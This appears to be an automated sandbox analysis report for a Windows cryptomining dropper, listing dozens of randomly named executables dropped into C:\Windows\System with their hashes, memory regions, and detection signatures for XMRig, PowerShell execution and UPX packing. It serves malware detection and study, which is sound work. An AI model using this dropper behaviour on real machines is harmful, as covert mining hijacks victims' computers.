MD5 687bdda6c670b4df22bb91750a915c8e
SHA1 6e73421e63c2b459d42fc2bd3e1c5b38645237eb
SHA256 64efb85d6e1f96da3e61770267cf2c5a1fbc97ea31e7e994e51e5f6397c83539
SHA512 a475891568b7b2eba82a12a5403c6f39e25d9ecbdfd5e81fb48926a88ee6c18ba45d1d1b149e9c31edddf0912ea002ee7d59a5e6a3814e6539f1180c2a345d2a

C:\Windows\System\wCCvcax.exe

MD5 d8580b25d7cb849b3ea7c6d07dd6a40e
SHA1 3cec8959a6f1f65cb5495c1f7fdc18bb70914720
SHA256 5cb5fd90ae4ec5f52725637792c8e9b4fb8fd16254ebe2f0386c98a59a50f9fa
SHA512 6b7bfa8ae6a46ce6def388d8aa0ab098ec74dd46529c6606b831329ae15b78469160ef020e240adeb21a623a0b4abe256cfa33da2f3314840f3a762dfeb5e434

C:\Windows\System\tivybSU.exe

MD5 647a09e4cc1c5b3c150b67f5d99eeaf6
SHA1 2a5def069920e0e0d50419bd62e613023e26b8c9
SHA256 c8e69375a58414f69e8f30c27860e7288695f5c19468f7a1441023678d641f00
SHA512 09ed32e361759b6bf798025e263cc32efc99c569ab7547d8d953388cb57c1018b9a86d223bac91e4ff8b8bf592e9e1c11a050aeb0b616aeace108e213ffae32e

C:\Windows\System\eTyYfAF.exe

MD5 5db3b16052d5a3323a6edab3399da077
SHA1 abff5f1800c0eec55f71459747523323a4699cfe
SHA256 f3d8a82c4805cb4ce40d0f76d2dda01925efc6fcda24f47630be80f2a38bcdeb
SHA512 d5bce4696b448a9f7826358ca2d463a54d194838ddc7c1c96f838b2a0f68a5b57fc6971fe3a1b08906a514dbac584a2bcaf8befed240af4b6df89a953979fa22

C:\Windows\System\DDLHUMi.exe

MD5 a6650b3f75978fb1f17a6edcf7f407bb
SHA1 f377a60c259b6900216bc321566be61afb186765
SHA256 98400be7ff7fcd29687dca89a94739fb6a76b082f6e7e93711ec812e00263c74
SHA512 f666d5040eb724bb53d921725ac769fecf4c102717e74dcbf178f1d7b959f3b5acea17d3fa81325b80d1d0d60d7795c203ca5e6cbbd920fab200df1a251e813c

C:\Windows\System\sXMRqAj.exe

MD5 db74eb7c8d22812cfd8c3f55740d06fb
SHA1 c43fee76763da70012cddbb86a0032ff7040fe21
SHA256 2d6fd90ada43891bc023ef7affd4693a2cb65122c245aa1f701aea9ba5b67008
SHA512 465053540dc5b68cf280c3a3b4de6fed9b91398b0fb84026b54fe0d9ff9ce37a4db75edd84cd5e8a05856f8e68de83fad55ba6c5d0abfb917f44939781187303

C:\Windows\System\lpKWiXm.exe

MD5 c3a727ea54ffd6c0f82868268af821e6
SHA1 90d71c33004323f4aebdef16e7bf89dfeef40907
SHA256 93992c22623716eff9176bb43bd61303a80d139ba3679dbffee2a6c7775855a0
SHA512 e578ce9f98d57ea047212812ae942e9bbff6fddcaef77e44037c9e7d103f602e73abebea5d7a4aa25b7b230fd39170afd2c9e73d02ca098a6e6d4f40998ba84c

C:\Windows\System\AZzDyUj.exe

MD5 8c80cf4e068f5c8f4c4613e5c970d727
SHA1 93804a4f16157e543c3886f187f424e5df4c6a1a
SHA256 a6884fbfd8fc2d9fead7bd8500d12d4bf3c7ce534a388174186371af9f61078e
SHA512 4d71bda001d856e5bac0bfb8f584356af030cd97f3d97e249cf1e5b252262cf7be10fdc0c3719ac10917165d53aff28da30aeef0b6177805701d8740007bffaa

C:\Windows\System\tTaUfid.exe

MD5 1ab9f25f3cf866a2d9d04b4dce628897
SHA1 121eace7a1dcf659f3dd4f0f92cd4801bf5cfd8d
SHA256 e8140b09da98427ec8d57ff2321031b448b62d1c216aa3ce0b3dc50ffcbb5d6b
SHA512 3ee1d8db3cc4fabcd64650f0d4103f18a262b7fbd480a61fd2ee57455714b642fe7984543c15be29b9137d85277e2f13e4231e1e80673353b454b3e199524095

C:\Windows\System\WbxEhAL.exe

MD5 f13598f3c1e66be809600abd6b6d0c68
SHA1 fec510a06fd9e41f8539f83ead76636fd1d417fa
SHA256 38ee7d0354a219fb43343a03104130efffaf2d2a1e4798f4a103fc70f6e72d93
SHA512 d9b4b739a7b41825a7e5b71497a7c1c65257df0103ea815a2046d677a8b78b8aaec152108c38f0cb41eda22d29bc825aacd29af1a33b23561dad597d3c056340

C:\Windows\System\liasDNp.exe

MD5 9e4c6331b182ccf974f549800dadf5e4
SHA1 9bf9112b8d95ccad6acf345303ef9964e13bd978
SHA256 7c3bef1104fdf137ce2152c9db7cfa94a910bd724e986bf4d87344c30b0402e5
SHA512 59dec1549cfd54f003089d47e4e2d8d51a68784647102bca44f3de6b8002d9058ed61f1339d1fd18f53d2be9f4758ec7760f05647d477790b58c624267471eeb

C:\Windows\System\wlNkaPl.exe

MD5 732f7d82df098aaf58fddc3149b33bb8
SHA1 94f9b757aa99bd419b9c47207c7f64038334e37c
SHA256 8003440c3c79cdb415ce446af4f23cf5ea67d5806bf6b01a1c8623c1e56ab76f
SHA512 b379b0268e1c066862e35fbd92b7d0463f3094722869b5eeaba9df66efa30cf7129f049b2edb27106602d4a981ce5551aec66015bcf357afdb50acdcaae2dade

C:\Windows\System\RORWCvZ.exe

MD5 9a5ccf20a10a5d70717cc289f53d7a68
SHA1 97c90336976b14823f87a6dd01182d9bce65c71a
SHA256 94b9c4c98ca39f19f61fec17a40a52da0c02813bb9c8124453bf034c3f1d2ff5
SHA512 1ef946607d611c4dff03a749063a0528f75217740977cac1d67bfd8becb91b0f306e7d88f35ea874f8c51aab085f712081e85679ef39960286fe9d421ebaf91b

C:\Windows\System\mdsggNm.exe

MD5 7a072ea2213f30433946164bed262927
SHA1 e66f504ef31c1dd105b24a294008d60ef13a2f76
SHA256 f6f22b91c526af75f5fe4dce25dfd554fc80c3855ea999d45094bfa95bd6111e
SHA512 0cb16f11d622b93a66f9adef944f672e8b3348e2e0478def769a0ab644fe0c3608c422e1bd5c41866b602465c0173e8dcbec0edfbd412f48df57e664dd24d3ed

C:\Windows\System\cpWyWrV.exe

MD5 ff08d776db56a0d2ca7853283e3fb822
SHA1 44b8882772ef0996d57b5dc591520414d097e790
SHA256 8cb63c8a16ca76eaa8c63bb7e0093db8ca5fae75b123d90597df845754c28393
SHA512 54ad833c22469b7832865709ada6bed1b9bea44c97cb26786c7ec718116a2dfb281249d0ae27150f22cb5439e74d06cc7b4cff3a1ec60520eac44225080b3602

C:\Windows\System\FIysWxA.exe

MD5 0dca3dff962cec3977d67206b6fe7661
SHA1 4146d8eeac82c9b9554417718aabb4c11c836b19
SHA256 9b3ef3d89808ae6be722894655cb95642501467c77919a8efbda93f50d3f3664
SHA512 e9de957a0cb804fc18c4c2c738057700e800112db31da7f813f74996bcd5ac36a2c7ea38a3e65c3489bdabce5a5d2badded11a698155e461a46f4c935f5e0f5b

C:\Windows\System\RUWLLQC.exe

MD5 a271a4700b9289d243f006c8c3591f4a
SHA1 b6602e3386a6f5d513362ece8277faa3b146c8ba
SHA256 b7cc941dffb151cf7e894e8d8d9fdf51c99beee5f336e65301cb80a384caaa5b
SHA512 9ddbc29bcaa8b99ed0e095ea491967e92cffa68da47842978b3012d0d68ff38119c4385c540190a92391e52ecbb5d5594535402408af8a5dade34008c1c29bf5

C:\Windows\System\CPaDGNf.exe

MD5 1ccaa6319292ae2e54439a6a65f46738
SHA1 b02b30bc1f3955839eb8a031b9267493329e7419
SHA256 eb43da7ebe63fb81b4a6c869be778d5fb600c0b0c6f15c93052badddc2403c03
SHA512 317804d9740b211e5059c2d27fe021cd039cc5f518557e293bba089a09a5f7832bf83fdee04a8aa64d17de871a27918649323f9012bd6efe525a6e01ae1327d9

C:\Windows\System\obKuKcS.exe

MD5 b1b37daff45e91c93b4ce32681e919b5
SHA1 aec8dcacaa5091d667802debf3640d6a7cead197
SHA256 9987365cea2a4e38551c6eb3cd4b9f4bb2118b478f6f885d19921e0e9f5e468e
SHA512 59046944170959fdb71b65079eb372604af5f4a9e9c0555173bf38cc0124f5890cda6592f453a5e2a1a161c874516fd195c8f126e8e66e50ab129996b6212c1d

memory/2116-160-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmp

C:\Windows\System\KANVVMG.exe

MD5 14cea22c06ca6178d020a1dedff80432
SHA1 e691464fb7b18ae4a85cf27af00119d6389a3d42
SHA256 e971b61965fbee6d961888915894694bda9706e595e89cd159f77b63cd0bc550
SHA512 e24f32af5696fd97b20c497b6054abb36f49551580ed01fe6a51cf47ba5613c986fb6dbb0733e2bd6b2bd8a0721033c5dd9e35852634ca0254fda3e26757eac9

C:\Windows\System\rwoOWnl.exe

MD5 c98139569853a40cc8c0674748d1103a
SHA1 2214aa6bbbe6d001fb0891d69860f90f80a9ad09
SHA256 b7485be7a297ca07f49c03c3e36dab398c5636892f747ebe7a01830270574548
SHA512 55ed9a1f4b6cdf26cad472e02b3211e054a51f0ec634f087a0b8d476c3951c7c62710832883ae9aca5bfc37b06d0262409c244658e5fc49dc8804ee4828d21d4

C:\Windows\System\ZAuZFir.exe

MD5 9647254dc367d9b163011253412de449
SHA1 6d7741b0b8b0a786f539df9ea2591b1c5c644d98
SHA256 b4b6a5f8f8a408d83030bd8aede89f9393a2dac167221732291d336301624cd1
SHA512 c56cb971555830978129ea20ec43c15d21fdc800f290159c8bb019f4cd09000931a6de12b00451fa01bedef17a7a762b48de960e628e2fef9ae7619eb80d1f35

C:\Windows\System\iAKgzZB.exe

MD5 e67940aa665a3e226a8089def21a1d4b
SHA1 4c5eae52f9bad8043116d08a8136b6bbf7ba2fba
SHA256 80106c707402a0a095069a80b6324748da33c0075259837ae1e0b53f76f04c3f
SHA512 718a4b7d670e6cf2b30757c11b0fa41fb000495abf3c67653bdf653710fc55781bda9c1d31590c6d83c11fefac4d1f34616488ef003f950687e69663a89d4ba0

C:\Windows\System\BIwZtbF.exe

MD5 1d1e2223dac68e966d9790a8230e6005
SHA1 1d9071bd4694468e3f3b6885ca24d94409fdc73f
SHA256 41dc2eff05846795b8bcff1c30b7485642edb1000aa9cc3ad8911e55f509b746
SHA512 e7175841dddf2ae613c7354188ae08c58e485952235bd333f03bda753bd35f78faaa1d02e5645e4f73827d3ac93bd6c6f7db7af11be0189124dbf5e6037099c5

C:\Windows\System\tjTcviI.exe

MD5 87be5c20e56b14f23592fbf5dccef1bb
SHA1 8e62017bb5a5a68ee6f97eb12c55417796fe74c0
SHA256 b4ae48b4aa598ed51926af066f9f9f03e0d45a77f216b4a6e54394ee652f38da
SHA512 f9dd885c0dafd6f9d6431bb7e384061e3fddc30809714920095ab3e31ba42b716ddc7472008d8082bb067585116de5c0ad891e247d9bb91b4f06567d2b06ee99

C:\Windows\System\WcvDFoo.exe

MD5 68d4fa95fea01587a8268ac1b4ba25d5
SHA1 18722b470682954b3f7ed597ee2ce83cc7edc050
SHA256 b30513e85eeb1dd317f177b716907ab30246bad2057797b9f39d36aa371df053
SHA512 1a366d2fa829fa244bf25842cf800926cfe56b051d0fce4dafa1677f4362cae8ba28e9f798f67cc182cb38ae35517d69fce6418cff922ca9f3c22a8a0e838e1f

memory/4492-86-0x00007FF6B9CC0000-0x00007FF6BA0B2000-memory.dmp

C:\Windows\System\lKfXUDB.exe

MD5 8520cd8ea25a6d27679e8ef36be2c800
SHA1 f0da2b4f3e4b6f340b0baabbce735223b5d58b44
SHA256 0abfa9a78b201d808590cb58b35e0c083e42eb1d5d4f9972d170b171fba3f712
SHA512 1a12bc88275906d76beaedb9ac20944d798bdb9d6b7c6724d80355762ceebbe9c1735b28ced4141c183ba4fcf314497a6d419f121f5d907f189bd22189f6e1f7

C:\Windows\System\USvNhcN.exe

MD5 79a3c99bc30114891412f96085f5cc3c
SHA1 ef183e2fdf08e079b99889ae2a09c0320da67d5c
SHA256 d961e4496899cd39dfa8fc5b329f797c1fa6d62ca23eff0d76dba34a7e152bd4
SHA512 89a21b0e1dd1855b0588080e12a3a818c3db2c26fbd94e62453727de14135204e485f24f12e8e0aa5fe857bcb46d5bf9b264b7bf072f6ca811db9e4a9759b02d

C:\Windows\System\jBKgZVY.exe

MD5 5af67020a0a2c1a73cfb8a50601dbd69
SHA1 576e420118177524ce32f4d7198c2a6add4a0481
SHA256 642961cfb06eda0bf292d01cacfd82d9a8d140814ab30d002b0f81e57abc1f71
SHA512 96bcd46bb9ea14d5a8d4a0eac8d66d4dff0523a97968855719c4180fda28c651b02c635f937875bd4a9e839cdd75d2979efb477e21a2eb37839c8a5ac91d70c5

memory/2116-58-0x00007FF8C0680000-0x00007FF8C1141000-memory.dmp

C:\Windows\System\YhhOMKX.exe

MD5 2ac15252a6acc242e3a79fdb210f1a09
SHA1 0aef81e307d52f2fba2c80dbb55188b2909ea1f9
SHA256 f99ef6b2a5ac786978fbee8e45bf19c03848007a4f670a9e7ab51874f8a6e89f
SHA512 89406c280497eaf720ef48e5bc59402a4f56916495a63fe43eb580a20213aef7e1b9125da57176fe3f9511611aed4d39316a8af60622616be881294b55ff9dd4

C:\Windows\System\iJIiCJq.exe

MD5 b122aff01c49a715209e0116bddd3b68
SHA1 818946a2a701b0ba85dad9a2479c5a47d32434ed
SHA256 309781c088b9aff43892c1116be9d916481e72ad91e5bbbaeaf52069c5c464db
SHA512 7c4629e10ebfecd0dead83903f7e897c922e68de790da76209c8cc88f098bc58c659ea9611d10556089321c1168068bf2968e466421b1aa5f3961083d6d65eaf

C:\Windows\System\wonldFJ.exe

MD5 3f9cfe8a165fbe5ed357bf4fb6550d1a
SHA1 d1f76cef8b11f404ce3021901f1968e523167625
SHA256 fe7331c05f745b95f5509c04136ec2be8073cae1c2054bbe90290f3a5e3a1c01
SHA512 7c297d93de1529b68ba232f55d08c5bdfcf13a5c3741f810e605eeec9da08911d3d07e6bd5c21436fbf2be3db2070f19515d3ae2f1e7604c2ff2f34139c616ce

memory/1604-4812-0x00007FF7F7A30000-0x00007FF7F7E22000-memory.dmp

memory/2764-4836-0x00007FF6C7310000-0x00007FF6C7702000-memory.dmp

memory/4992-4881-0x00007FF783440000-0x00007FF783832000-memory.dmp

memory/2840-4876-0x00007FF69A690000-0x00007FF69AA82000-memory.dmp

memory/1984-4890-0x00007FF7EB190000-0x00007FF7EB582000-memory.dmp

memory/1616-4894-0x00007FF7B77F0000-0x00007FF7B7BE2000-memory.dmp

memory/1284-4918-0x00007FF710A90000-0x00007FF710E82000-memory.dmp

memory/452-5026-0x00007FF7B3210000-0x00007FF7B3602000-memory.dmp

memory/4756-5046-0x00007FF6ED6D0000-0x00007FF6EDAC2000-memory.dmp

memory/4576-5029-0x00007FF72DEE0000-0x00007FF72E2D2000-memory.dmp

memory/3268-5007-0x00007FF7436A0000-0x00007FF743A92000-memory.dmp

memory/2744-4960-0x00007FF79E000000-0x00007FF79E3F2000-memory.dmp

memory/3636-4966-0x00007FF6F4810000-0x00007FF6F4C02000-memory.dmp

memory/100-4931-0x00007FF657E20000-0x00007FF658212000-memory.dmp

memory/1756-4925-0x00007FF73FA90000-0x00007FF73FE82000-memory.dmp

memory/5008-4922-0x00007FF6D6480000-0x00007FF6D6872000-memory.dmp

memory/2592-4913-0x00007FF641DE0000-0x00007FF6421D2000-memory.dmp

memory/1684-4908-0x00007FF786600000-0x00007FF7869F2000-memory.dmp

memory/2852-4905-0x00007FF69D620000-0x00007FF69DA12000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 16:53

Reported

2024-05-25 16:56

Platform

win7-20231129-en

Max time kernel

149s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\eZThTBy.exe N/A
N/A N/A C:\Windows\System\zBPTMiJ.exe N/A
N/A N/A C:\Windows\System\jBUuSRA.exe N/A
N/A N/A C:\Windows\System\AJPwSyP.exe N/A
N/A N/A C:\Windows\System\LkRkWcr.exe N/A
N/A N/A C:\Windows\System\tVupfkN.exe N/A
N/A N/A C:\Windows\System\OpfSKTR.exe N/A
N/A N/A C:\Windows\System\PdFHizp.exe N/A
N/A N/A C:\Windows\System\OSkSPdP.exe N/A
N/A N/A C:\Windows\System\sYhwsPW.exe N/A
N/A N/A C:\Windows\System\wwpCdve.exe N/A
N/A N/A C:\Windows\System\nLMMjoV.exe N/A
N/A N/A C:\Windows\System\QdVDdIn.exe N/A
N/A N/A C:\Windows\System\iXMMciz.exe N/A
N/A N/A C:\Windows\System\ImfhaFt.exe N/A
N/A N/A C:\Windows\System\WgeOcgh.exe N/A
N/A N/A C:\Windows\System\IXklvfC.exe N/A
N/A N/A C:\Windows\System\SXvjWvM.exe N/A
N/A N/A C:\Windows\System\qPdURaF.exe N/A
N/A N/A C:\Windows\System\OkQwduK.exe N/A
N/A N/A C:\Windows\System\rXYXQKy.exe N/A
N/A N/A C:\Windows\System\qJPJUXy.exe N/A
N/A N/A C:\Windows\System\ouTLVBD.exe N/A
N/A N/A C:\Windows\System\FBKbFDT.exe N/A
N/A N/A C:\Windows\System\AmFXOMk.exe N/A
N/A N/A C:\Windows\System\bzyBHJR.exe N/A
N/A N/A C:\Windows\System\JrCUfdI.exe N/A
N/A N/A C:\Windows\System\imAyrQb.exe N/A
N/A N/A C:\Windows\System\UreVSiU.exe N/A
N/A N/A C:\Windows\System\goFxpPs.exe N/A
N/A N/A C:\Windows\System\IFRfvxo.exe N/A
N/A N/A C:\Windows\System\yGNKmwX.exe N/A
N/A N/A C:\Windows\System\FHPtHCk.exe N/A
N/A N/A C:\Windows\System\mfYXpHb.exe N/A
N/A N/A C:\Windows\System\wQupyhZ.exe N/A
N/A N/A C:\Windows\System\ndOYDrg.exe N/A
N/A N/A C:\Windows\System\GTEYUHW.exe N/A
N/A N/A C:\Windows\System\ZYQnmJe.exe N/A
N/A N/A C:\Windows\System\ziNWgPX.exe N/A
N/A N/A C:\Windows\System\fSNZGSq.exe N/A
N/A N/A C:\Windows\System\wJAkQZQ.exe N/A
N/A N/A C:\Windows\System\GUrCsek.exe N/A
N/A N/A C:\Windows\System\CRAINsH.exe N/A
N/A N/A C:\Windows\System\McOUhml.exe N/A
N/A N/A C:\Windows\System\xIchOHM.exe N/A
N/A N/A C:\Windows\System\qfWyuYr.exe N/A
N/A N/A C:\Windows\System\pWUvLrk.exe N/A
N/A N/A C:\Windows\System\aBZigJA.exe N/A
N/A N/A C:\Windows\System\RuBcXUJ.exe N/A
N/A N/A C:\Windows\System\jGaKNek.exe N/A
N/A N/A C:\Windows\System\WaEdMUd.exe N/A
N/A N/A C:\Windows\System\ShOYjBf.exe N/A
N/A N/A C:\Windows\System\SlnBlYu.exe N/A
N/A N/A C:\Windows\System\HEJieWT.exe N/A
N/A N/A C:\Windows\System\fbwPTMw.exe N/A
N/A N/A C:\Windows\System\ZwHfztq.exe N/A
N/A N/A C:\Windows\System\urmyQMj.exe N/A
N/A N/A C:\Windows\System\aaidpzn.exe N/A
N/A N/A C:\Windows\System\pLUNPbq.exe N/A
N/A N/A C:\Windows\System\jPWhxde.exe N/A
N/A N/A C:\Windows\System\XZXrAoX.exe N/A
N/A N/A C:\Windows\System\SfPakEg.exe N/A
N/A N/A C:\Windows\System\swAxAnf.exe N/A
N/A N/A C:\Windows\System\qJfZKAq.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
